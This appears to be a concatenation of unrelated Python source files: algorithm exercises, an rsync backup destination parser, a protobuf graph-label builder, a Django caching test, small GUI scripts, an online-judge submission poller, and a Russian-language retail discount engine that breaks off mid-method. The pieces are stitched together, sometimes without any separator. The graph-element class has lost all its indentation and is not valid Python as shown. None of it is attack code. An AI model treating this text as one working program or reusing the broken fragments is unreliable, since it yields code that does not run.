|
# -*- coding:utf-8 -*-
class Solution:
    """Checks whether a sequence could be the post-order traversal of a BST."""

    def VerifySquenceOfBST(self, sequence):
        """Return True if `sequence` is a valid BST post-order traversal.

        An empty sequence returns False (matching the original judge's
        expected answer, even though an empty tree is arguably a valid BST).

        For every prefix ending at position root_i, the last element is that
        subtree's root: everything before it must split into a run of values
        smaller than the root followed by a run of larger values. Checking
        every suffix root makes this O(n^2) overall.
        """
        if not sequence:
            return False
        root_i = len(sequence)-1
        while root_i:
            i = 0
            # Skip the left subtree: values smaller than the current root.
            while(sequence[i] < sequence[root_i]):
                i += 1
            # Skip the right subtree: values larger than the current root.
            while(sequence[i] > sequence[root_i]):
                i += 1
            # If the scan stopped before the root, a smaller value appeared
            # inside the right-subtree run -> not a valid post-order.
            if i != root_i:
                return False
            root_i -= 1  # also terminates the loop once root_i reaches 0
        return True


if __name__ == '__main__':
    s = Solution()
    print(s.VerifySquenceOfBST([4,8,6,12,16,14,10]))
#!/usr/bin/env python3
"""
Rotate Matrix: Given an image represented by an NxN matrix, where each pixel in
the image is 4 bytes, write a method to rotate the image by 90 degrees. Can you
do this in place?
"""
# Check if the provided matrix is 4Nx4N.
def is_4n_x_4n(matrix):
    """True when `matrix` is square with a side length that is a positive multiple of 4."""
    size = len(matrix)
    if size == 0 or size % 4 != 0:
        return False
    return all(len(row) == size for row in matrix)
# Time complexity: O(n^2).
# Space complexity: O(n).
def rotate_matrix(matrix):
    """Return a new matrix rotated 90 degrees clockwise, or None if invalid."""
    if not is_4n_x_4n(matrix):
        return None
    # Reversing the rows then transposing is exactly a clockwise rotation:
    # result[i][j] == matrix[n-1-j][i].
    return [list(column) for column in zip(*matrix[::-1])]
# Time complexity: O(n^2).
# Space complexity: O(1).
def rotate_matrix_in_place(matrix):
    """Rotate `matrix` 90 degrees clockwise in place, one concentric layer at a time.

    Returns True on success, False when the matrix is not square 4Nx4N.
    """
    if not is_4n_x_4n(matrix):
        return False
    n = len(matrix)
    # Work inward one "ring" (layer) at a time; each iteration of the inner
    # loop cycles four cells (top/right/bottom/left) into each other.
    for layer in range(int(n/2)):
        first = layer
        last = n - 1 - layer
        for i in range(first, last):
            offset = i - first
            # Save top.
            top = matrix[first][i]
            # left -> top.
            matrix[first][i] = matrix[last-offset][first]
            # bottom -> left.
            matrix[last-offset][first] = matrix[last][last-offset]
            # right -> bottom.
            matrix[last][last-offset] = matrix[i][last]
            # top -> right.
            matrix[i][last] = top
    return True
|
import turtle
import random

# Heading/angle conventions follow "logo" mode (0 = up, clockwise angles).
turtle.mode("logo")

# Random stroke width shared by both triangles.
pen_width = random.randint(3, 18)
turtle.pensize(pen_width)

# First triangle: orange, drawn with right (clockwise) turns.
turtle.pencolor("orange")
turtle.right(90)
for _ in range(3):
    turtle.forward(100)
    turtle.right(120)

# Second triangle: blue, drawn with left turns from a lower start point.
turtle.pu()
turtle.goto(0, -58)
turtle.pd()
turtle.pencolor("blue")
for _ in range(3):
    turtle.forward(100)
    turtle.left(120)

turtle.done()
|
# rsync-system-backup: Linux system backups powered by rsync.
#
# Author: Peter Odding <peter@peterodding.com>
# Last Change: May 4, 2018
# URL: https://github.com/xolox/python-rsync-system-backup
"""Parsing of rsync destination syntax (and then some)."""
# Standard library modules.
import logging
import os
import re
# External dependencies.
from humanfriendly import compact
from property_manager import (
PropertyManager,
mutable_property,
required_property,
set_property,
)
# Modules included in our package.
from rsync_system_backup.exceptions import (
InvalidDestinationError,
ParentDirectoryUnavailable,
)
RSYNCD_PORT = 873
"""
The default port of the `rsync daemon`_ (an integer).
.. _rsync daemon: https://manpages.debian.org/rsyncd.conf
"""
# All patterns below use raw string literals. The advanced daemon pattern
# previously wrote \d inside a plain string, which only worked through
# Python's deprecated unknown-escape passthrough (DeprecationWarning today,
# a SyntaxError in future versions).
LOCAL_DESTINATION = re.compile(r'^(?P<directory>.+)$')
"""
A compiled regular expression pattern to parse local destinations,
used as a fall back because it matches any nonempty string.
"""
SSH_DESTINATION = re.compile(r'''
    ^ ( (?P<username> [^@]+ ) @ )? # optional username
    (?P<hostname> [^:]+ ) :        # mandatory host name
    (?P<directory> .* )            # optional pathname
''', re.VERBOSE)
"""
A compiled regular expression pattern to parse remote destinations
of the form ``[USER@]HOST:DEST`` (using an SSH connection).
"""
SIMPLE_DAEMON_DESTINATION = re.compile(r'''
    ^ ( (?P<username> [^@]+ ) @ )? # optional username
    (?P<hostname> [^:]+ ) ::       # mandatory host name
    (?P<module> [^/]+ )            # mandatory module name
    ( / (?P<directory> .* ) )? $   # optional pathname (without leading slash)
''', re.VERBOSE)
"""
A compiled regular expression pattern to parse remote destinations of the
form ``[USER@]HOST::MODULE[/DIRECTORY]`` (using an rsync daemon connection).
"""
ADVANCED_DAEMON_DESTINATION = re.compile(r'''
    ^ rsync://                     # static prefix
    ( (?P<username>[^@]+) @ )?     # optional username
    (?P<hostname> [^:/]+ )         # mandatory host name
    ( : (?P<port_number> \d+ ) )?  # optional port number
    / (?P<module> [^/]+ )          # mandatory module name
    ( / (?P<directory> .* ) )? $   # optional pathname (without leading slash)
''', re.VERBOSE)
"""
A compiled regular expression pattern to parse remote destinations of the form
``rsync://[USER@]HOST[:PORT]/MODULE[/DIRECTORY]`` (using an rsync daemon
connection).
"""
DESTINATION_PATTERNS = [
ADVANCED_DAEMON_DESTINATION,
SIMPLE_DAEMON_DESTINATION,
SSH_DESTINATION,
LOCAL_DESTINATION,
]
"""
A list of compiled regular expression patterns to match destination
expressions. The patterns are ordered by decreasing specificity.
"""
# Public identifiers that require documentation.
__all__ = (
'logger',
'RSYNCD_PORT',
'LOCAL_DESTINATION',
'SSH_DESTINATION',
'SIMPLE_DAEMON_DESTINATION',
'ADVANCED_DAEMON_DESTINATION',
'DESTINATION_PATTERNS',
'Destination',
)
# Initialize a logger for this module.
logger = logging.getLogger(__name__)
class Destination(PropertyManager):
    """
    The :class:`Destination` class represents a location where backups are stored.
    The :attr:`expression` property is a required property whose value is
    parsed to populate the values of the :attr:`username`, :attr:`hostname`,
    :attr:`port_number`, :attr:`module` and :attr:`directory` properties.
    When you read the value of the :attr:`expression` property you get back a
    computed value based on the values of the previously mentioned properties.
    This makes it possible to manipulate the destination before passing it on
    to rsync.
    """

    @required_property
    def expression(self):
        """
        The destination in rsync's command line syntax (a string).
        :raises: :exc:`.InvalidDestinationError` when you try to set
                 this property to a value that cannot be parsed.
        """
        if not (self.hostname or self.directory):
            # This is a bit tricky: Returning None here ensures that a
            # TypeError will be raised when a Destination object is
            # created without specifying a value for `expression'.
            return None
        # Rebuild the expression from its parts: daemon destinations use the
        # rsync://HOST[:PORT]/MODULE form, SSH destinations use HOST:PATH.
        value = 'rsync://' if self.module else ''
        if self.hostname:
            if self.username:
                value += self.username + '@'
            value += self.hostname
            if self.module:
                if self.port_number:
                    value += ':%s' % self.port_number
                value += '/' + self.module
            else:
                value += ':'
        if self.directory:
            value += self.directory
        return value

    @expression.setter
    def expression(self, value):
        """Automatically parse expression strings."""
        # DESTINATION_PATTERNS is ordered from most to least specific, so the
        # first match wins; the for/else raises when nothing matched at all.
        for pattern in DESTINATION_PATTERNS:
            match = pattern.match(value)
            if match:
                captures = match.groupdict()
                # Only non-empty captures are applied, so omitted parts keep
                # their (empty string) defaults.
                non_empty = dict((n, c) for n, c in captures.items() if c)
                self.set_properties(**non_empty)
                break
        else:
            msg = "Failed to parse expression! (%s)"
            raise InvalidDestinationError(msg % value)

    @mutable_property
    def directory(self):
        """The pathname of the directory where the backup should be written (a string)."""
        return ''

    @mutable_property
    def hostname(self):
        """The host name or IP address of a remote system (a string)."""
        return ''

    @mutable_property
    def module(self):
        """The name of a module exported by an `rsync daemon`_ (a string)."""
        return ''

    @mutable_property
    def parent_directory(self):
        """
        The pathname of the parent directory of the backup directory (a string).
        :raises: :exc:`.ParentDirectoryUnavailable` when the parent directory
                 can't be determined because :attr:`directory` is empty or '/'.
        """
        directory = os.path.dirname(self.directory.rstrip('/'))
        if not directory:
            raise ParentDirectoryUnavailable(compact("""
                Failed to determine the parent directory of the destination
                directory! This makes it impossible to create and rotate
                snapshots for the destination {dest}.
            """, dest=self.expression))
        return directory

    @mutable_property
    def port_number(self):
        """
        The port number of a remote `rsync daemon`_ (a number).
        When :attr:`ssh_tunnel` is set the value of :attr:`port_number`
        defaults to :attr:`executor.ssh.client.SecureTunnel.local_port`,
        otherwise it defaults to :data:`RSYNCD_PORT`.
        """
        return self.ssh_tunnel.local_port if self.ssh_tunnel is not None else RSYNCD_PORT

    @port_number.setter
    def port_number(self, value):
        """Automatically coerce port numbers to integers."""
        set_property(self, 'port_number', int(value))

    @mutable_property
    def ssh_tunnel(self):
        """A :class:`~executor.ssh.client.SecureTunnel` object or :data:`None` (defaults to :data:`None`)."""

    @mutable_property
    def username(self):
        """The username for connecting to a remote system (a string)."""
        return ''

    def __enter__(self):
        """Automatically open :attr:`ssh_tunnel` when required."""
        if self.ssh_tunnel:
            self.ssh_tunnel.__enter__()
        return self

    def __exit__(self, exc_type=None, exc_value=None, traceback=None):
        """Automatically close :attr:`ssh_tunnel` when required."""
        if self.ssh_tunnel:
            self.ssh_tunnel.__exit__(exc_type, exc_value, traceback)
|
from management import management_pb2
from operator import itemgetter
class GraphElementAdder:
SINGLE = False
ALL = False
name = None
ELEMENT = None
element_to_update = None
supported_parameters = ["properties", "readOnly", "partitioned", "direction", "multiplicity", "directed"]
def __init__(self, **kwargs):
self.properties = None
self.readOnly = None
self.partitioned = None
self.directed = None
self.direction = None
self.multiplicity = None
for property_name, property_value in kwargs.items():
setattr(self, property_name, property_value)
def __are_valid_parameters_passed__(self, **kwargs):
valid_params_passed = all([x in self.supported_parameters for x in kwargs.keys()])
if not valid_params_passed:
invalid_param_idx = [i for i, x in enumerate([x in self.supported_parameters
for x in kwargs.keys()]) if x is False]
invalid_params = itemgetter(*invalid_param_idx)(kwargs.keys())
raise LookupError(f"Invalid parameter passed. The passed parameter {invalid_params} "
f"is not part of supported parameter list ${self.supported_parameters}")
def set_element(self, element):
"""
Args:
element (GraphElement):
Returns:
"""
self.ELEMENT = element
if isinstance(element, management_pb2.VertexLabel):
self.element_to_update = "VertexLabel"
elif isinstance(element, management_pb2.EdgeLabel):
self.element_to_update = "EdgeLabel"
else:
raise ValueError("Invalid element accessed in setter() method. Expecting class to be "
"EdgeLabel or VertexLabel for " + str(type(element)))
def __build_element__(self):
for property_name in self.supported_parameters:
value = getattr(self, property_name, None)
if value is not None:
if property_name == "properties":
if self.element_to_update == "VertexLabel":
if isinstance(value, str):
vp = [management_pb2.VertexProperty(name=value)]
else:
vp = []
for prop in value:
vp.append(management_pb2.VertexProperty(name=prop))
self.ELEMENT.properties.extend(vp)
else:
if isinstance(value, str):
ep = [management_pb2.EdgeProperty(name=value)]
else:
ep = []
for prop in value:
ep.append(management_pb2.EdgeProperty(name=prop))
self.ELEMENT.properties.extend(ep)
elif property_name == "multiplicity":
self.ELEMENT.multiplicity = management_pb2.EdgeLabel.Multiplicity.Value(value)
elif property_name == "directed":
directed = value if isinstance(value, bool) else (True if value.lower() == "true" else False)
# print(value, directed)
# exit(-1)
if directed:
self.ELEMENT.directed = management_pb2.EdgeLabel.Directed.Value("directed_edge")
else:
self.ELEMENT.directed = management_pb2.EdgeLabel.Directed.Value("undirected_edge")
elif property_name == "direction":
raise NotImplementedError("Not implemented custom direction for Edges PUT request")
elif property_name == "readOnly":
self.ELEMENT.readOnly = value if isinstance(value, bool) else (True if value.lower() == "true" else False)
elif property_name == "partitioned":
self.ELEMENT.partitioned = value if isinstance(value, bool) else (True if value.lower() == "true" else False)
else:
raise ValueError(f"Expecting the keys to be either of {self.supported_parameters} "
f"but got {property_name}")
return self
def get_element(self):
    """Apply all pending parameter changes and return the protobuf element."""
    return self.__build_element__().ELEMENT
|
"""
Test running
"""
from django.core.cache import cache
from django.test import SimpleTestCase
from cache_results import cache_results
class CacheResultsTest(SimpleTestCase):
    """Exercises the cache_results decorator: caching, bypass, refresh and clear."""

    def test_decorator(self):
        # Tracks how many times the wrapped function actually executed, per argument.
        nonlocal_dict = {}

        def get_cache_key(arg1):
            return 'foo.{}'.format(arg1)

        @cache_results(key_function=get_cache_key, alias='default')
        def example(arg1):
            nonlocal_dict.setdefault(arg1, 0)
            counter = nonlocal_dict[arg1] + 1
            nonlocal_dict[arg1] = counter
            return "dummy{}".format(counter)

        # First call, enter cache
        example(1)
        self.assertEqual(nonlocal_dict[1], 1)
        self.assertEqual(cache.get(get_cache_key(1)), "dummy1")
        # Calling again should be cached
        example(1)
        example(1)
        self.assertEqual(nonlocal_dict[1], 1)  # still called once
        # Bypass calls the original function (without updating the cache)
        example.bypass_cache(1)
        example.bypass_cache(1)
        self.assertEqual(nonlocal_dict[1], 3)  # now called thrice
        # Refresh updates and recaches
        self.assertEqual(cache.get(get_cache_key(1)), "dummy1")
        example.refresh_cache(1)
        self.assertEqual(nonlocal_dict[1], 4)  # called 4 times
        self.assertEqual(cache.get(get_cache_key(1)), "dummy4")
        # And allow removal
        example.clear_cache(1)
        self.assertIsNone(cache.get(get_cache_key(1)))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
from recap import recap
def run():
    """CLI entry point: hand the command-line arguments (sans program name) to recap."""
    args = sys.argv[1:]
    recap.main(args)


if __name__ == '__main__':
    run()
|
#Console Clearing method
def clear_console(x=520, y=580):
    """Clear the Run console of the PyCharm IDE via GUI automation.

    Clicks at screen position (x, y) to focus the console pane, then sends the
    Alt+L shortcut (the author's PyCharm "clear console" binding).

    Args:
        x, y: screen coordinates of the console pane. Generalized from the
              previously hard-coded (520, 580) so other screen layouts can
              pass their own position; defaults keep the old behavior.
    """
    import pyautogui  # third-party GUI automation; imported lazily on purpose
    pyautogui.moveTo(x, y)
    pyautogui.click()
    pyautogui.hotkey('alt', 'l')


clear_console()
|
import logging
import zipfile
import click
from lxml import etree
@click.group()
@click.argument('genofile', type=click.File('r+b'))
@click.pass_context
def cli(ctx, genofile):
    # Entry point: load the genealogy XML from GENOFILE, which is either a
    # zip archive containing Data.xml or a plain XML file, and stash the
    # parsed tree in the click context for the subcommands.
    # (Comment, not docstring, on purpose: a docstring would change --help output.)
    logging.basicConfig()
    # BUG FIX: seekable is a method; the bare attribute reference was always
    # truthy, so non-seekable streams could be handed to is_zipfile (which seeks).
    if genofile.seekable() and zipfile.is_zipfile(genofile):
        with zipfile.ZipFile(genofile, 'r') as zf:
            with zf.open('Data.xml', 'r') as xml:
                geno = etree.parse(xml)
    else:
        geno = etree.parse(genofile)
    ctx.obj = {'tree': geno}
@cli.resultcallback()
@click.pass_context
def done(ctx, changed, genofile):
    # Runs after all subcommands: write the (possibly modified) tree back.
    # Non-seekable output is written directly; a seekable file is rewound,
    # truncated and rewritten as a zip archive containing Data.xml.
    geno = ctx.obj['tree']
    # BUG FIX: seekable is a method — `not genofile.seekable` was always
    # False (bound methods are truthy), so the direct-write branch was dead.
    if not genofile.seekable():
        geno.write(genofile)
    else:
        genofile.seek(0)
        genofile.truncate(0)
        with zipfile.ZipFile(genofile, 'w') as zf:
            with zf.open('Data.xml', 'w') as xml:
                geno.write(xml)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 22 05:52:20 2021
@author: profjahier
"""
import tkinter as tk
import tkinter.messagebox as msgb # boîte de dialogue
def verification():
    """Validate the typed password; close the app on success, warn and reset otherwise."""
    if mot_de_passe.get() != 'python':
        # Wrong password: warn the user and clear the entry field.
        msgb.showwarning('Résultat','Mot de passe incorrect.\nVeuillez recommencer !')
        mot_de_passe.set('')
        return
    # Correct password: confirm in a dialog, then close the main window.
    msgb.showinfo('Résultat','Mot de passe correct.\nAu revoir !')
    mon_app.destroy()
# Create the main window
mon_app = tk.Tk()
mon_app.title('Identification requise')
# Label widget with the prompt text
texte1 = tk.Label(mon_app, text='Mot de passe ')
texte1.grid(row=0, column=0)
# Entry widget (input field); typed characters are masked with '*'
mot_de_passe = tk.StringVar()
ligne_saisie = tk.Entry(mon_app, textvariable=mot_de_passe, show='*', bg='bisque', fg='maroon')
ligne_saisie.focus_set()
ligne_saisie.grid(row=0, column=1)
# Button widget that triggers the password check above
tk.Button(mon_app, text='Valider', command=verification).grid(row=0, column=2)
mon_app.mainloop()
'''程序入口,进行数据库的读取和存储,读取出来的数据提交给judger模块'''
import time
import config
import judger
import pymysql
from support import NoMatchError, LoginError, SubmitError
def main():
    """Poll the `submit` table for the oldest 'Waiting' submission and judge it."""
    while True:
        # Open a fresh database connection per polling iteration.
        db = pymysql.connect(host = config.dbhost, port = config.dbport, user = config.dbuser, passwd = config.dbpassword, db = config.dbname, charset = config.dbcharset)
        cursor = db.cursor()
        match = cursor.execute("SELECT * FROM submit WHERE id = (SELECT min(id) FROM submit WHERE result = 'Waiting')")
        if not match:
            # Nothing to judge: close, wait, poll again.
            cursor.close()
            db.close()
            time.sleep(3)
            continue
        match = cursor.fetchall()
        sub = {}
        # Row layout: id, oj, pid, language, code, ...
        sub["oj"], sub["pid"], sub["language"], sub["code"] = match[0][1], match[0][2], match[0][3], match[0][4]
        print("New task")
        try:
            sub["runid"], sub["result"], sub["timeused"], sub["memoryused"], sub["errorinfo"] = judger.judge(sub, config.users, config.timeout, config.time_interval)
        except KeyError:
            # Unsupported judge target: drop the submission so it is not retried.
            cursor.execute("DELETE FROM submit WHERE id = %s",match[0][0])
            db.commit()
            print("%s Not Find In Support"%sub["oj"])
        except LoginError:
            print("Login error")
        except SubmitError:
            print("Submit error")
        except NoMatchError as error:
            print("No match error:%s"%error)
        except Exception as error:
            print("Unknown error:%s"%error)
        else:
            # Judged successfully: persist the verdict back into the row.
            cursor.execute("UPDATE submit SET runid = %s, result = %s, timeused = %s, memoryused = %s, errorinfo = %s WHERE id = %s",(
                sub["runid"], sub["result"], sub["timeused"], sub["memoryused"], sub["errorinfo"], match[0][0]))
            db.commit()
            print("end of the judged")
        finally:
            cursor.close()
            db.close()
        # NOTE(review): this break ends the loop after the first judged task,
        # so the process exits instead of polling forever — confirm intended
        # (the indentation of the original source was ambiguous here).
        break


if __name__=="__main__":
    main()
import sqlite3, os, threading, json, time, sys
import barcodenumber
from datetime import datetime
from domino.core import log
from domino.postgres import Postgres
from discount.actions import Action
from discount.series import Series
from discount.core import DISCOUNT_DB, SCHEMES_FOLDER, Engine
#from discount.actions import ActionSetItem
from discount.cards import Card, CardLog
from discount.checks import Check
from discount.schemas import ДисконтнаяСхема
from tables.sqlite.schema import Schema
from discount.dept_sets import DeptSetItem
from threading import Lock
#from settings import log as discount_log
from domino.databases.sqlite import Sqlite
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from tables.sqlite.product_set import ГотовыеНаборы
# Serializes AccountWorker.update() so only one thread rebuilds scheme workers.
UpdateLock = Lock()
# Action-type code of the standard card processing; its Acceptor is always
# placed in before_accept and runs first during post-sale processing.
СТАНДАРТНАЯ_ОБРАБОТКА_КАРТ = 'A16'
class ErrorCalculator:
    """Stand-in for an action whose real handler failed to load.

    Wherever the real Calculator/Acceptor would run, this stub only records
    the "unavailable" message and the original load error on the check's log.
    """

    def __init__(self, action_ID, error):
        self.action_ID = action_ID
        self.error = error
        self.сообщение = f'{action_ID} : НЕДОСТУПНА'

    def _report(self, курсор, чек):
        """Write the unavailability message instead of doing any work."""
        чек.write_log(self.сообщение, self.error)

    # Both the calculation and the post-sale entry points just report.
    calc = _report
    accept = _report

    def check_base_conditions(self, check):
        """Always applicable, so the report is always written."""
        return True
class AccountSchemeWorker:
    """Runs all discount actions of one discount scheme against checks (receipts).

    From the scheme's SQLite database it builds lists of action handlers:
    calculation-time ones (calulators/after_totals/for_sale) and post-sale ones
    (acceptors/accept_calc/before_accept), then applies them via calc(),
    accept(), get_prices() and get_keywords().
    """
    #def __init__(self, application, курсор, схема, goods, LOG, SQLITE):
    def __init__(self, application, schema_id, goods, path, bigsize):
        # application: shared context providing the 'action_types'/'card_types' registries
        # schema_id:   id of the discount scheme inside the SQLite db at *path*
        # goods:       Goods catalogue used by actions to match products
        # bigsize:     flag forwarded to the ready-made product sets (ГотовыеНаборы)
        self.application = application
        self.schema_id = schema_id
        self.схема = None  # discount-scheme record, loaded in open()
        self.goods = goods
        self.path = path
        self.bigsize = bigsize
        self.opened = False
        self.calulators = []     # calculation actions, the main list (sic: "calulators")
        self.after_totals = []   # calculation actions that run after discount totals
        self.for_sale = []       # actions used when pricing for tags and labels
        self.acceptors = []      # post-sale actions
        self.accept_calc = []    # post-sale actions that can also calculate
        self.before_accept = []  # post-sale actions that must run first
        self.action_names = {}   # action id -> full action name
        self.готовые_наборы = None  # ready-made product sets, created in open()
        #self.open(dbpath, LOG)

    @property
    def action_types(self):
        """Registry of action-type handler classes supplied by the application."""
        return self.application['action_types']

    @property
    def card_types(self):
        """Registry of card-type handlers supplied by the application."""
        return self.application['card_types']

    def close(self):
        """Release the SQLAlchemy session opened by open(); idempotent."""
        if self.opened:
            self.SQLITE.close()
            self.opened = False

    def open(self, LOG):
        """Load the scheme from its SQLite file and build all action handlers.

        Idempotent: returns immediately when already opened. Returns self.
        """
        if self.opened: return self
        start = time.perf_counter()
        # Reset all handler lists before rebuilding them.
        self.calulators = []     # calculation actions, the main list
        self.after_totals = []   # calculation actions that run after totals
        self.for_sale = []       # actions used when pricing for tags and labels
        self.acceptors = []      # post-sale actions
        self.accept_calc = []    # post-sale actions that can also calculate
        self.before_accept = []  # post-sale actions that run first
        self.action_names = {}   # action id -> full name
        #--------------------------------------------------
        # Read-only raw connection for the record classes, plus an ORM session.
        connection = sqlite3.connect(f'file://{self.path}?mode=ro', uri=True)
        ENGINE = create_engine(f'sqlite:///{self.path}')
        Session = sessionmaker(bind=ENGINE)
        self.SQLITE = Session()
        курсор = connection.cursor()
        #--------------------------------------------------
        self.схема = ДисконтнаяСхема.get(курсор, self.schema_id)
        LOG.header(f'{self.схема.наименование}')
        #--------------------------------------------------
        self.LOG = LOG
        self.готовые_наборы = ГотовыеНаборы(self.SQLITE, LOG = LOG, bigsize = self.bigsize)
        self.create_actions(LOG, connection)
        self.готовые_наборы.prepeare(LOG = self.LOG)  # sic: "prepeare"
        self.opened = True
        LOG(f'{self.схема.наименование}', start)
        connection.close()
        return self

    def готовый_набор(self, sets, name=None):
        """Return a ready-made product set ("готовый набор") for *sets*/*name*."""
        return self.готовые_наборы.готовый_набор(sets, name)

    def create_actions(self, LOG, connection):
        """Instantiate Calculator/Acceptor handlers for every action of the scheme.

        A handler that raises during construction is replaced by an
        ErrorCalculator stub so the failure surfaces in every check log.
        """
        схема = self.схема
        курсор = connection.cursor()
        actions_start = time.perf_counter()
        actions = []
        # Collect the available calculation actions.
        for action_id in схема.расчетные_акции.список_акций:
            action = Action.get(курсор, action_id)
            if action is None:
                log.error(f'Не найдено описание акции {action_id}')
                LOG(f'error:Не найдено описание акции {action_id}')
                continue
            if action.status < 0:
                # negative status = action disabled
                LOG(f'error:Акция "{action_id}" недоступна')
                continue
            actions.append(action)
        LOG(f'Получение списка расчетных акций', actions_start)
        for action in actions:
            try:
                LOG.header(f'{action.full_name(self.action_types)}({action.id}, {action.type_})')
                action_start = time.perf_counter()
                action_type = self.action_types[action.type]
                calculator = action_type.Calculator(self, курсор, action, LOG, self.SQLITE)
                if calculator.for_sale:
                    self.for_sale.append(calculator)
                if action.type == 'A24' or action.type == 'A26':
                    # A24/A26 run only after discount totals are computed
                    self.after_totals.append(calculator)
                else:
                    self.calulators.append(calculator)
                self.action_names[f'{action.ID}'] = action.полное_наименование(self.action_types)
                LOG(f'{action.full_name(self.action_types)}({action.id}, {action.type_})', action_start)
            except BaseException as ex:
                # Broken action: keep a reporting stub in its place.
                LOG(f'error:{ex}')
                log.exception(__file__)
                calculator = ErrorCalculator(action.id, f'{ex}')
                self.calulators.append(calculator)
        # Standard card processing (СТАНДАРТНАЯ_ОБРАБОТКА_КАРТ) always goes first on accept.
        action_start = time.perf_counter()
        try:
            action_type = self.action_types[СТАНДАРТНАЯ_ОБРАБОТКА_КАРТ]
            self.before_accept.append(action_type.Acceptor(self, курсор, None, self.LOG, self.SQLITE))
        except BaseException as ex:
            log.exception(f'{self} : {СТАНДАРТНАЯ_ОБРАБОТКА_КАРТ} : {ex}')
            LOG(f'{ex}')
        LOG(f'{СТАНДАРТНАЯ_ОБРАБОТКА_КАРТ}', action_start)
        actions = []
        actions_start = time.perf_counter()
        # NOTE(review): this first pass over the post-sale actions only logs
        # problems and never appends anything; the loop below repeats the same
        # checks and does append — presumably leftover code. Confirm.
        for action_id in схема.послепродажные_акции.список_акций:
            action = Action.get(курсор, action_id)
            if action is None:
                log.error(f'Не найдено акции "{action_id}"')
                LOG(f'Не найдено описание акции {action_id}')
                continue
            if action.status < 0:
                LOG(f'Акция {action_id} заблокирована')
                continue
        LOG('Получение списка послепродажных акций', actions_start)
        # Collect the available post-sale actions.
        for акция_ID in схема.послепродажные_акции.список_акций:
            action = Action.get(курсор, акция_ID)
            if action is None:
                LOG(f'error:Не найдено описание акции "{акция_ID}"')
                continue
            if action.status < 0:
                LOG(f'error:Акция "{акция_ID}" недоступна')
                continue
            actions.append(action)
        for action in actions:
            try:
                LOG(f'{action.full_name(self.action_types)}({action.id}, {action.type_})')
                action_start = time.perf_counter()
                action_type = self.action_types[action.type]
                worker = action_type.Acceptor(self, курсор, action, self.LOG, self.SQLITE)
                self.acceptors.append(worker)
                if hasattr(worker, 'calc'):
                    # acceptors that can also calculate take part in calc()
                    self.accept_calc.append(worker)
                self.action_names[f'{action.ID}'] = action.полное_наименование(self.action_types)
                LOG(f'{action.full_name(self.action_types)}({action.id}, {action.type_})',action_start)
            except BaseException as ex:
                log.exception(f'{self} : {action} : {ex}')
                LOG(f'error:{ex}')
                calculator = ErrorCalculator(action.id, f'{ex}')
                self.calulators.append(calculator)

    def __str__(self):
        return f'AccountSchemeWorker({self.schema_id})'

    def __repr__(self):
        return self.__str__()

    def make_totals(self, check):
        """Aggregate per-action totals (discount 'd', points spent 'p-') over all lines.

        Amounts are kept in kopecks (int(x * 100)); results go to check.totals.
        """
        totals = {}
        check.points = {}
        # Gifts granted per account seed the totals.
        for account_id, gift in check.gifts.items():
            totals[account_id] = gift
        for line in check.lines:
            actions = line.actions
            if actions is not None:
                for action in actions:
                    action_id = f'{action[Check.LINE_ACTION_ID]}'
                    discount = action[Check.LINE_ACTION_DISCOUNT]
                    if discount:
                        discount = int(discount * 100)  # everything in kopecks
                    card_id = action[Check.LINE_ACTION_CARD_ID]
                    if card_id and check.card_id and card_id == check.card_id:
                        # points only count for the check's personal card
                        points = action[Check.LINE_ACTION_POINTS]
                        if points:
                            points = int(points * 100)  # everything in kopecks
                    else:
                        points = 0
                    if discount or points:
                        total = totals.get(action_id)
                        if total:
                            total['d'] = total.get('d', 0) + discount
                            if points:
                                total['p-'] = total.get('p-', 0) + points
                        else:
                            total = {'d':discount}
                            if points:
                                total['p-'] = points
                            totals[action_id] = total
        check.totals = totals
        check.write_log(f'ПОДСЧЕТ ИТОГОВ')

    def calc(self, engine, check, LOG=None):
        """Run the calculation actions for *check*.

        In for_sale mode only the price-tag actions run; otherwise cards are
        looked up first, then all calculators, accept-capable acceptors, the
        totals, and finally the after-totals actions.
        """
        engine.pg_connection.autocommit = True
        check.goods = self.goods
        check.params['schema_id'] = self.schema_id
        if check.for_sale:
            for action_worker in self.for_sale:
                try:
                    if action_worker.check_base_conditions(check):
                        action_worker.calc(engine, check)
                except BaseException as ex:
                    log.exception(f'{action_worker}')
                    check.write_log(f'{action_worker} : {ex}')
        else:
            # Find and load the cards attached to the check.
            msg = []
            for card_ID, card_info in check.cards.items():
                CARD = Card.get(engine, card_ID)
                if CARD:
                    if CARD.TYPE == 0:
                        # TYPE 0 is the check's personal card
                        check.card_id = card_ID
                        if CARD.points:
                            check.card_points = int(CARD.points * 100)
                        else:
                            check.card_points = 0
                    card_info[Check.CARD_CARD] = CARD
                    msg.append(f'карта {card_ID}')
                else:
                    msg.append(f'карта {card_ID} НЕ НАЙДЕНА')
            check.write_log('ПОИСК КАРТ', ", ".join(msg))
            #--------------------------------------
            for action_worker in self.calulators:
                try:
                    if action_worker.check_base_conditions(check):
                        action_worker.calc(engine, check)
                except BaseException as ex:
                    log.exception(f'{action_worker}')
                    check.write_log(f'{action_worker} : {ex}')
            check.action_names = self.action_names
            # Post-sale actions that also support calculation.
            for action_worker in self.accept_calc:
                try:
                    if action_worker.check_base_conditions(check):
                        action_worker.calc(engine, check)
                except BaseException as ex:
                    log.exception(f'{action_worker}')
                    check.write_log(f'{action_worker} : {ex}')
            self.make_totals(check)
            # Actions that must see the computed totals.
            for action_worker in self.after_totals:
                try:
                    if action_worker.check_base_conditions(check):
                        action_worker.calc(engine, check)
                except BaseException as ex:
                    log.exception(f'{action_worker}')
                    check.write_log(f'{action_worker} : {ex}')

    def get_keywords(self, keywords, check, LOG=None):
        """Collect keyword data from every calculator that supports it."""
        check.goods = self.goods
        check.params['schema_id'] = self.schema_id
        for calculator in self.calulators:
            if hasattr(calculator, 'get_keywords'):
                calculator.get_keywords(keywords, check)

    def get_prices(self, prices, dept_code, date, LOG=None):
        """Collect promo prices from every calculator that supports it."""
        for calculator in self.calulators:
            if hasattr(calculator, 'get_prices'):
                calculator.get_prices(prices, dept_code, date)

    def find_used_cards(self, engine, чек):
        """Collect the cards referenced by per-line action info and load them.

        Also accumulates per-card extra data: DISCOUNT and used POINTS.
        """
        # Add cards mentioned in the line-level action info to the check's card list.
        for line in чек.lines:
            actions = line.params.get(Check.LINE_CALC_INFO)
            if actions:  # the line carries info about applied actions
                for action in actions:
                    скидка = action[Check.LINE_ACTION_DISCOUNT]  # discount amount
